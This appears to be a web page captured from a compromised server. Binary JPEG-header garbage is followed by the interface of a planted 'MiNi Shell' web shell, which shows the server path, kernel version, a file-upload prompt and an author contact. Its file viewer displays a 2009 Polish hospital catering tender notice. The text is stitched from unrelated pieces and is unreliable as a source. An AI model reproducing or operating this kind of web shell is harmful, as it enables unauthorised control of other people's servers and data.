JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090226/42626-N-2009.html

<p class="kh_header"><b>Tczew: PN/1/2009 - Catering</b><br>
<b>Numer ogłoszenia: 42626 - 2009; data zamieszczenia: 26.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Rehabilitacyjny i Opieki Długoterminowej s.p.z.o.z. , ul. 1 Maja 2, 83-110 Tczew, woj. pomorskie, tel. 058 5313072, faks 058 5313072.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szriod.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PN/1/2009 - Catering.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa -  przygotowanie i dostawa całodziennego wyżywienia (śniadania, obiady i kolacje) dla pacjentów Szpitala Rehabilitacyjnego i Opieki Długoterminowej S.P.Z.O.Z w Tczewie, przy ulicy 1-go Maja 2. 
    a) Każdy posiłek podstawowy (śniadanie, obiad i kolacja) musi zawierać dostateczną ilość   
    	produktów białkowych oraz dodatek warzyw lub owoców. Wartość kaloryczna obiadu 	powinna mieścić się w przedziale 805 - 920 kcal z dodatkiem:
    	 Dla posiłków: 
    	śniadanie  - należy przewidzieć kawę mleczną, zupę mleczną, 
    	obiad - kompot, kisiel płynny itp.
    	kolacja - należy planować herbatę wraz z cukrem.
    b) Posiłki gorące, dostarczane muszą być w temp.: zupy 75 0C, II danie 63 0C, surówki 4 0C.
    c) Przygotowywanie posiłków odbywać się musi z uwzględnieniem diet stosowanych w 
   	Szpitalu Rehabilitacyjnym, oraz zgodnie z zleceniami lekarzy, wg zamówień z 	poszczególnych oddziałów (wykaz stosowanych diet w załączniku nr 3).
    d) Zamawianie posiłków na dany dzień realizowane będzie przez uprawnionych pracowników  
    	Szpitala.
    e) Posiłki należy dostarczać wg ustalonego harmonogramu, w osobnych naczyniach 
    	(termosach) z oznaczeniem oddziału dla którego jest dostawa i ilością porcji. Termosy wraz 	z wkładami zabezpiecza Wykonawca.
    f) Indywidualne naczynia i sztućce nie są wymagane, jednakże Zamawiający może zwrócić się z      	prośbą do Wykonawcy o dostarczenie naczyń i sztućców jeśli zaistnieje taka potrzeba.
     g) Wykonawca musi liczyć się z ewentualnością nieprzewidzianego dostarczenia dodatkowej 	porcji wyżywienia, o ile zajdzie potrzeba nagłego przyjęcia pacjenta do szpitala czego 	wcześniej Zamawiający nie mógł przewidzieć. Wykonawca zostanie o tym poinformowany 	telefonicznie. 
    h) Wykonawca zobowiązany będzie do sporządzania dekadowych jadłospisów w oparciu o 
        	aktualne przepisy prawne obowiązujące przy ustalaniu racji pokarmowych w całodziennym 
        	wyżywieniu określonych grup ludności - Szpitale. 
     i) Jadłospis winien być przedstawiony do akceptacji Zamawiającego z 4 dniowym  
        	wyprzedzeniem. Należy uwzględnić przygotowywanie posiłków tradycyjnych w okresach 
        	świątecznych.
     j) Do Wykonawcy należało będzie prowadzenie ewidencji wydawanych posiłków 
       	(dokument WZ) z podziałem na diety oraz oddziały, potwierdzane każdorazowo imiennie 
        	przez uprawnione osoby, Zamawiający zastrzega sobie prawo do kontroli zgodności 
        	rachunków z ewidencją tych posiłków.
      k) Zakupy surowców Wykonawca realizował będzie w punktach, które zapewniają ich wysoką 
        	jakość, zupy powinny być przygotowywane na bazie produktów naturalnych bez użycia  
        	półproduktów (np. zupy w proszku).
      l) W przypadku zastosowania innych technologii produkcji posiłków niż wymagane lub 
        	zalecane stosownymi przepisami Wykonawca musi uzyskać zgodę Powiatowej Stacji 
        	Sanitarno-Epidemiologicznej na ich stosowanie. Zamawiający zastrzega sobie prawo
        bieżącej kontroli w zakresie przestrzegania przez Wykonawcę przepisów dotyczących 
        technologii produkcji i  jakości wykonywanych usług.
      m) Obowiązkiem Wykonawcy jest przechowywanie próbek pokarmowych ze wszystkich 
      	wykonanych i dostarczonych posiłków każdego dnia przez okres 72 godzin z 
     	oznaczeniem daty, godziny, zawartości próbki pokarmowej z podpisem osoby
      	odpowiedzialnej za pobieranie tych próbek. 
      n) Obowiązkiem Wykonawcy będzie utylizacja odpadków żywnościowych.
      o) Obowiązkiem Wykonawcy będzie dostarczanie posiłków do pomieszczenia dystrybucji  
       	w Szpitalu.
       p) Obowiązkiem Wykonawcy będzie mycie termosów we własnym zakresie, wraz z wkładami 	po wydaniu posiłków.
       r) Maksymalna odległość na jaką Zamawiający dopuszcza dowożenie posiłków od   
       	Wykonawcy  do siedziby Zamawiającego nie może przekroczyć 40 km.
       s) Do oferty należy dołączyć przykładowy jadłospis dekadowy dla diety ogólnej wraz z gramaturą.

 - Ilość oddziałów do których będą  dostarczane posiłki  - 3
 - Ilość posiłków (średnia) w oddziałach:
-	Oddział Rehabilitacyjny - 43
-	Oddział Hospicyjny - 10
-	Zakład Opiekuńczo - Leczniczy  - 20

Ilość posiłków (średnio) dziennie ogółem: - 73



Posiłki dla pacjentów muszą być dostarczone do Szpitala o ściśle określonych porach dnia, w związku z ustalonymi godzinami ich podawania :
-    śniadanie dostarczyć do 7:30 , podanie 8:00 do 8.30
-    obiad  dostarczyć do 11:30 podanie 12.30
-	kolacja dostarczyć do 16:30  lub dostarczyć  razem z obiadem, podanie 17.00

UWAGA: kolacja może zostać dostarczona razem z obiadem.

Średnia planowana ilość posiłków na rok - 27.156.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 55.52.00.00-1, 55.52.30.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> brak<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki podmiotowe określone w art. 22 Ustawy Prawo Zamówień Publicznych z dn. 29. 01. 2004 z późn. zm. (Dz. U. Nr 19 poz. 177 z 09. 02. 2004r. tj. min. muszą:

1.	Posiadać uprawnienia do występowania w obrocie prawym zgodnie z wymogami 
ustawowymi,
2.	Posiadać uprawnienia niezbędne do wykonania zamówienia, jeżeli uprawnienia takie 
są wymagane z mocy ustawy   
3.	Posiadać wiedzę, doświadczenie, potencjał ekonomiczny i techniczny, a także pracowników
zdolnych do wykonania zamówienia, a w przypadku ich braku powinni przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia
4.	Znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia i być ubezpieczony od odpowiedzialności w zakresie prowadzonej działalności gospodarczej - OC za produkt.
5.	Nie podlegać wykluczeniu z ubiegania się o zamówienie publiczne zgodnie z art. 22 ust 1 i 2 ustawy Prawo Zamówień Publicznych  z dnia 29.01.2004 r., /Dz.U. Nr 19 z 2004r. Poz 177
6.	Odpowiadać za jakość, zgodność z warunkami technicznymi i określonymi dla przedmiotu zamówienia.
7.	Dołożyć należytej staranności przy realizacji zobowiązań umowy.
8.	Poinformować Zamawiającego o swoich kontaktowych numerach telefonu, faksu, adresu mailowego oraz o innych ustaleniach niezbędnych dla sprawnego i terminowego wykonania zamówienia
      9.   Spełniać wszystkie warunki zawarte w niniejszej specyfikacji.

Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a. aktualny (nie starszy niż półroczny) odpis albo zaświadczenie z właściwego organu                       										  rejestracyjnego,
      że Oferent jest uprawniony do występowania w obrocie prawym potwierdzające, że zakres
      działalności Oferenta odpowiada profilowi usług objętych postępowaniem przetargowym
      ze wskazaniem osób upoważnionych do wykonywania czynności prawnych w imieniu Oferenta.

Jeśli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa powyżej, wówczas składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jej likwidacji ani nie ogłoszono upadłości (wystawione wcześniej niż 6 miesięcy przed upływem składania ofert). Jeżeli w kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w zdaniu poprzedzającym zastępuje się je dokumentem zawierającym oświadczenie złożonego przed notariuszem, właściwym organem sądowym, administracyjnym albo, organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania. 

 b. pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli Osobą  
     podpisującą nie jest osoba upoważniona na podstawie wpisu do właściwego organu rejestracyj-
     nego. Jeżeli pełnomocnictwo nie ma postaci aktu notarialnego, powinno zawierać pieczęć
     Oferenta, imienną pieczątkę wystawiającego pełnomocnictwo i jego podpis.
c. Oświadczenie Oferenta - zgodnie z art. 22 ust 1 Prawo Zamówień Publicznych
-	załącznik nr 5,
d.  uzupełnioną ofertą - załącznik nr 1, która musi być opatrzona podpisem i pieczątką osoby upoważnionej do podpisania oferty oraz opieczętowanie pieczątką firmową,
e. wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie co najmniej 2 usługi przygotowania i dostawy całodziennego wyżywienia dla Szpitala o wartości brutto nie niższej niż 100.000 zł. brutto rocznie każda z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. 
f. aktualną na dzień składania ofert polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest Ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej - OC

VI. Dokumenty, o których mowa w dziale IV pkt.9 winny być przedstawione w formie
      oryginału lub kserokopii poświadczonych za zgodność z oryginałem przez Oferenta.

Uwaga: 
                  Wszystkie załączone kopie dokumentów muszą być uwierzytelnione podpisem i 
                   pieczątką osoby upoważnionej do podpisania oferty oraz wpięte w jedną całość   
                   (skoroszyt).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szriod.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Rehabilitacyjny I Opieki Długoterminowej
Samodzielny Publiczny Zakład Opieki Zdrowotnej
Sekretariat pok. 20
Ul. 1-go Maja 2
83-110 Tczew.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2009 godzina 10:00, miejsce: Szpital Rehabilitacyjny I Opieki Długoterminowej
Samodzielny Publiczny Zakład Opieki Zdrowotnej
Sekretariat pok. 20
Ul. 1-go Maja 2
83-110 Tczew.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com